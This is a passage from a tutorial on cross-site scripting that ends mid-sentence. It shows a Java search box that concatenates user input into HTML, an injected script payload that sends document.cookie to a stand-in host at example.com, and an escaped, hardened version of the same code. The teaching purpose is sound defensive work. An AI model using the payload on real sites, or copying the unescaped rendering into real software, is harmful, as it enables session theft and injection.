Cross-Site Scripting

Learn about cross-site scripting, server-side rendering, automated scanning tools, and some ways to protect privileged data.

What is XSS?

Cross-site scripting (XSS) happens when a service renders a user’s input directly into HTML without escaping it for the context it lands in (here, a quoted attribute value). It’s a close cousin of other injection attacks such as SQL injection. Both take advantage of the fact that we represent structured data (HTML, SQL) as sequences of ordinary characters: the attacker supplies input that contains a premature delimiter, closing the context the developer intended, followed by commands of the attacker’s own. For example, suppose we have a service that echoes back the user’s “search” parameter in the results page. It has some server-side rendering code like this:

String queryBox = "<input type='text' value='"
    + request.getParameter("search") // XSS happens here.
    + "' />";

An attacker can run a search with this nasty little query string, which closes the value attribute and the input tag, then injects a script that sends the victim’s cookies to a host the attacker controls (wrapped to fit the page):

'><script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'

After the server inserts that string, the resulting HTML looks like this (wrapped to fit the page):

<input type='text' value=''> <script>document.location='http://www.example.com/capture?id='+ document.cookie</script>'' />
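The vulnerable rendering above beside a hardened version of the same template, as an added example that is not part of the original page. It takes the search parameter as a plain String rather than reading it from request.getParameter, so it runs without a servlet container, and escapeHtmlAttr is a hand-rolled helper written for this example, not a library call the page uses.

```java
// Added example (not the page's own code): vulnerable vs. hardened rendering
// of the search box. The search value is passed in as a String instead of
// being read from an HttpServletRequest so this compiles and runs stand-alone.
public class SearchBoxRenderer {

    /** Vulnerable: concatenates the raw parameter into the attribute value. */
    static String renderUnsafe(String search) {
        return "<input type='text' value='" + search + "' />"; // XSS happens here.
    }

    /**
     * Escapes the five characters that can change meaning inside HTML text or a
     * quoted attribute value. Hand-rolled for illustration; in production use a
     * maintained encoder (for example the OWASP Java Encoder) rather than this.
     */
    static String escapeHtmlAttr(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Hardened: same template, but the untrusted value is escaped first. */
    static String renderSafe(String search) {
        return "<input type='text' value='" + escapeHtmlAttr(search) + "' />";
    }

    public static void main(String[] args) {
        // Constructed input: the page's payload, which closes the attribute and
        // the tag, then exfiltrates document.cookie to an attacker-controlled host.
        String payload = "'><script>document.location='http://www.example.com/capture?id='"
                + "+document.cookie</script>'";

        String unsafe = renderUnsafe(payload);
        String safe = renderSafe(payload);
        System.out.println("Unsafe: " + unsafe);
        System.out.println("Safe:   " + safe);

        // Self-check: the hardened output must not contain a real script tag or
        // a stray quote that could terminate the attribute early.
        if (safe.contains("<script") || safe.contains("''>")) {
            throw new AssertionError("escaping failed: " + safe);
        }
        if (!unsafe.contains("<script")) {
            throw new AssertionError("expected the unsafe renderer to emit a script tag");
        }
    }
}
```

In the unsafe output the browser sees a closed input element followed by a genuine script element and runs it; in the safe output the whole payload stays inside one attribute value and is simply displayed as text in the box. Two caveats a practitioner should keep in mind: this escaper is correct only for HTML text and quoted attribute values (an unquoted attribute, a URL, or a JavaScript string needs a different, context-specific encoder), and the cookie theft in this particular payload succeeds only if the session cookie lacks the HttpOnly flag, though the injected script can still act on the user's behalf within the page either way.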

Server-side rendering

This is malformed HTML to be sure, but browsers are pretty lenient about that. When the client’s browser hits the script tag in the middle, it ...